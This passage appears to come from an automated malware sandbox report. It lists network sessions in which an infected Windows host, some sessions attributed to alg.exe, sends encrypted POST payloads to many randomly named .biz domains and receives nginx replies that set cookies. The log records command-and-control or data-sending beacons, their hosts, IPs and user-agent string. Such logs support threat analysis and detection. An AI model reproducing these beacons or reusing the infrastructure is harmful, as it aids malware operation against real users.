                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:15.806541920 CET834OUTData Raw: b1 8b 7a a5 f1 95 3c 00 36 03 00 00 bd 4a d9 8e e4 24 03 c7 be 4f fc f3 9f a5 f2 0f 3d 71 01 3b cb c8 85 db 47 e5 b5 d3 80 bd ca 73 93 b3 08 91 da 5c 82 44 c7 1f 18 51 fd f9 b1 bb c3 33 09 b6 97 8d 03 3a b6 b6 59 2f 78 0f 6d 12 4d 00 7b 66 0a 17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: z<6J$O=q;Gs\DQ3:Y/xmM{f)JV2nrG5WWpqmrf(,6'4]+1QB|[Q1UD/='+/ra_I9""jg1dRiL]LTAE/Q6|
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.264738083 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ac81a3800b8747ac2a4eee83646c98cf|155.94.241.187|1731920296|1731920296|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        26192.168.2.105000554.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.714605093 CET357OUTPOST /lqbpdlmeudihjsyy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.714628935 CET834OUTData Raw: 01 ca d1 89 2c 50 68 86 36 03 00 00 28 a8 7a d7 64 3d 83 80 18 75 c4 23 a3 46 66 1a ac 96 c4 db dd c7 7a cb 49 b6 53 4c 9d 1e 7a a6 8b bd 34 f9 64 43 9a 58 72 3a fc b8 c7 e3 a2 7a e2 40 46 78 5d 31 41 c0 67 fd 74 b3 d0 12 a2 1a 7e e4 f6 12 e7 5d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,Ph6(zd=u#FfzISLz4dCXr:z@Fx]1Agt~]Z?zl(w>#Ygg.j{fF)3g=$u@s0~|Hc60Tefu'rGB4-UgJT1&o{c"g(b
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.546256065 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4dffa1c7dba4f11012806d0ce3cd5bb9|155.94.241.187|1731920298|1731920298|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        27192.168.2.105000644.221.84.105807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.855055094 CET351OUTPOST /qaejwi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.855091095 CET778OUTData Raw: ae ac 8c ce 13 15 d2 c1 fe 02 00 00 17 b8 1d 95 e5 a8 61 1e bd 96 1d 47 e7 a9 fd e4 34 ab 0e 8d 7d 14 29 26 27 0c 8c fc 7f 95 01 66 60 c8 30 3c c8 c6 cd ec 73 93 1a a2 7a 30 57 8b 8d 50 cc e8 8d 91 04 94 80 b6 7e e1 8b 23 a0 a0 2e 43 5a 3f 57 e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: aG4})&'f`0<sz0WP~#.CZ?Wl|j5g"Qjq>>.\[LUQ9-`5;E P2;g*)?/=Yo%%-w|*_o>(M]j))0s&YD
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.516431093 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4c734c81a67e1c2e6c8b3d21317e3392|155.94.241.187|1731920298|1731920298|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        28192.168.2.105000744.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.568231106 CET350OUTPOST /xsynoi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.568249941 CET834OUTData Raw: fa b7 44 3a b2 ac 4c b5 36 03 00 00 7a 08 da b0 f0 49 67 8a 79 54 c4 9a 90 39 2f 17 8d 6d ce 13 23 25 3d 1b c5 3c f6 34 fe d1 1c 76 48 77 0b 98 c2 0c 8a 56 74 38 da ec 6e d2 00 d1 33 0f aa 93 36 c8 fc 61 bb a5 9a d5 80 cd c9 fa 00 91 f9 8b d3 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: D:L6zIgyT9/m#%=<4vHwVt8n36a@9~YGD$\3jMi]y^X{gbt,UG.}=,YO`\=W*l~Y>0M|z}Qb5vpZ#a|G:s}
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.228943110 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=df57fefee3c1f779e42b678f70ad8797|155.94.241.187|1731920299|1731920299|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        29192.168.2.105000818.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.891002893 CET356OUTPOST /kxeknkvhxjifd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.891002893 CET778OUTData Raw: 6c 02 6f c9 49 d4 fd 51 fe 02 00 00 b9 a8 30 66 60 10 61 1a cc 0d 57 1e 51 75 89 e8 09 d6 12 56 f5 28 b3 42 8d 22 fd f9 32 bd 83 30 09 13 84 07 5d 68 7b 20 51 64 e8 31 64 23 d3 49 5b d4 36 61 96 05 b7 d4 df 4d e6 6f b9 e8 2a fc 00 1c 1d 56 18 37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: loIQ0f`aWQuV(B"20]h{ Qd1d#I[6aMo*V7Q%;> =Z/,1)0|KdJX!u`i*&\9E;an5pXt"5x7b1RP*g;x0jGt[MGo;!S[Gg,~<gVp$d~
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.349637985 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=21798887c7c6cac43eb57f2f98a1df36|155.94.241.187|1731920300|1731920300|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        30192.168.2.1050009172.234.222.14380
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.248648882 CET356OUTPOST /jrbjefwrwpdia HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.248648882 CET834OUTData Raw: 8c 49 b7 6d 74 57 7b 9d 36 03 00 00 99 d8 cc 1a 23 e5 e8 47 bb d0 2e e0 c6 5e 7f 6f c1 f0 39 bc 65 d4 66 82 c6 03 c7 0a c6 5e 60 66 9c fa 6f 99 1b df 8c 82 18 e3 76 bf d6 fa 5d d6 c2 75 ed 91 de bb 47 4e bb f3 5a 04 08 df a1 64 f8 66 d8 e0 c2 d4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ImtW{6#G.^o9ef^`fov]uGNZdfx;\R1<EQe6{AF])~&`2!_~4~.HOG#VIzB?TsGcG'\<Ux>{MRI N$ ;q(%o5!13I>u


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        31192.168.2.1050010172.234.222.14380
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.947443962 CET359OUTPOST /odbjxuabwhunfmmt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:19.947443962 CET834OUTData Raw: 4f a4 e5 96 95 16 08 ff 36 03 00 00 21 93 c6 88 c3 f7 b3 d3 d5 84 03 2f db 6a 3f a6 1b 16 2e 5c 54 b9 8d 40 6d b0 53 6f 95 ac 4f a1 b3 63 b0 60 30 aa f0 00 aa 80 89 e7 06 c8 34 3c f9 50 52 a7 7c 48 37 6c 7f 31 58 1c 50 34 cb ad 80 14 6b 7f 52 ec
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: O6!/j?.\T@mSoOc`04<PR|H7l1XP4kRNjmC@k 2zG0E{YXnA'D%`#iKN*9DA>k1/ +7~C\!^V.MO 5:ZE,]{\B^+bF


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        32192.168.2.1050011172.234.222.143807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626451015 CET355OUTPOST /slpstmitttatqv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.626451015 CET778OUTData Raw: 8a ab 49 23 69 4a fb 9a fe 02 00 00 33 81 0b 71 de c0 b3 de f4 de 12 97 7b 6c 88 fb 0e 90 06 dc 40 a3 80 55 00 14 8f 4c 4d a3 c2 7d a5 7a 59 5e 63 8c 68 49 35 61 d8 72 ab ce 05 21 b8 7f 32 d9 a5 37 50 c1 41 b7 70 90 83 5e 88 04 0d 5f e1 db ad 12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: I#iJ3q{l@ULM}zY^chI5ar!27PAp^_>aMvs>)[Z"|2PrIrwYq["[!!_7G~smju;,k0WfPPd{.;&xeCg?A$(yMrS-+H[}xRX(2WrK,


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        33192.168.2.105001218.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.642258883 CET352OUTPOST /kwwcclrc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.642258883 CET834OUTData Raw: 47 c5 96 b3 5f 41 1e 6d 36 03 00 00 7d 71 d6 51 91 c8 dc 83 93 96 8a 62 b5 02 df 71 d4 3a 2b f4 95 cb 66 26 2a d9 73 7f 23 a0 aa c3 e9 7e 52 b3 cb 4a 2a 7f 67 05 58 a9 f5 b4 32 eb 06 4c 9e cd 78 eb 56 37 53 06 32 31 1a f0 bb 3c 23 f9 12 32 38 c2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: G_Am6}qQbq:+f&*s#~RJ*gX2LxV7S21<#28{y>G6co5aN>~+jZDtR(7Pi:tSEHHPdVJyoj.D!8*e@x*U_=x&\ukEl*G%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.099942923 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5605b0ffa416d2e351b978bf2736a52a|155.94.241.187|1731920301|1731920301|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        34192.168.2.1050013172.234.222.143807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.427056074 CET354OUTPOST /mndfsbyfnglsm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:21.427088022 CET778OUTData Raw: cc 1b 54 ea 5b 9d 84 7b fe 02 00 00 56 6b 6f 2e 21 8d 99 93 51 7e fa 52 b9 ae 8f 7a 05 e2 1e 1d 08 38 94 10 02 be f4 fd 35 7e 2b 04 b4 b0 14 91 15 4a c1 89 7a 48 6b 3f f0 5f b5 a1 47 b3 d8 66 db cb b9 59 27 a3 63 ab a0 dc 0b b1 97 64 e5 90 90 65
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: T[{Vko.!Q~Rz85~+JzHk?_GfY'cdeA^dmcOMg81CSDM6qm4c3)b! "t)N}EHR_!rhK;/zV(^]R[%0TaMe3;CW'jQbx k


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        35192.168.2.105001482.112.184.19780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.164906979 CET357OUTPOST /ynekytqvwifwsqd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.164906979 CET834OUTData Raw: cf 48 b4 99 5c f0 08 f3 36 03 00 00 78 2d c0 32 52 5e 47 7e f2 01 e1 43 63 c1 b9 76 7d 42 04 04 ad 7c a0 e8 1f bb 0c 7e c9 b6 0b 02 a9 8e fa aa 00 55 99 7b 4d 11 f9 df cc 3e 66 f9 78 b2 39 49 90 07 33 c7 b2 2a 4b 0a 12 5a cb d0 f5 48 58 42 65 19
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: H\6x-2R^G~Ccv}B|~U{M>fx9I3*KZHXBeB(fWgk&`wb(lU#!NyykQDIQ,Q&wK'CYa<b'YZ8f:L/5iK.cJ)6j}&-Wcg\:u


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        36192.168.2.105001534.246.200.160807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.422775030 CET353OUTPOST /xkorvlthchk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:22.422915936 CET778OUTData Raw: bf dc fa 31 08 7b e6 4b fe 02 00 00 06 22 b6 d6 9c 89 c7 b8 40 65 d7 2c ec cf 20 d4 cd d3 cd e9 bd b1 e4 bb bc ef 05 90 a0 db 9e 5f b4 70 6d 99 dc 50 8c 4d aa f8 40 41 58 48 a6 84 9b d2 ff 0a 08 1d 02 2e f6 8a 38 c9 75 ba 04 65 0b d1 ce 30 f7 ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1{K"@e, _pmPM@AXH.8ue0of0i*nHE2i uoo67QTl]L!k1bi$!7pgNSLP%(n2TZzi1M&P=1X4W/yF:_s@q
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:23.393579960 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=41604b3f481b1c043e65e9f296a39ade|155.94.241.187|1731920303|1731920303|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


